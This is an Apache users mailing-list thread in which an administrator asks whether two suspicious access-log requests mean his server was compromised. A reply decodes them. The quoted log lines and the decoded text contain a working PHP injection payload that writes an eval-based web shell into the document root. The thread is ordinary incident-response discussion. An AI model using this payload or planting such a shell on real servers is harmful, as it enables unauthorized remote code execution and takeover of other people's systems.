The first line is trying to create the file webconfig.txt.php in your DOCUMENT_ROOT directory, with the contents of the file being:
<?php eval($_POST[1]);?> I didn't decode the remaining lines. I think they're just trying to do the same thing. ----- Original Message ----- From: bernd.len...@helmholtz-muenchen.de To: users@httpd.apache.org Sent: Monday, February 6, 2017 11:41:13 AM GMT -05:00 US/Canada Eastern Subject: Re: [users@httpd] am i hacked ? ----- On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote: > Hi, > > just in the moment i found two very weird entries in may access_log: > > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B > HTTP/1.1" 200 90 > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B > HTTP/1.1" 200 90 > > What upsets me is that these two requests have statuscode 200, which mean it > was > successfull. > The IP is from ukraine. Where can i find out what these %charcacters mean ? > Does > anyone understand what happened here ? It's apache 2.2.3 64bit. > > Thanks for any hint. > > Bernd > What i find out already: https://url-encoder.de/ helped me to decode the URL: /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUME NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-'; Currently i don't understand what this means. I don't find a file webconfig.txt.php on my system. Currently no weird process, no new user in /etc/passwd, no packtes to the network which includes this ip. Thankful for any tip. Bernd Helmholtz Zentrum Muenchen Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH) Ingolstaedter Landstr. 1 85764 Neuherberg www.helmholtz-muenchen.de Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen Registergericht: Amtsgericht Muenchen HRB 6466 USt-IdNr: DE 129521671 --------------------------------------------------------------------- To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org --------------------------------------------------------------------- To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org For additional commands, e-mail: users-h...@httpd.apache.org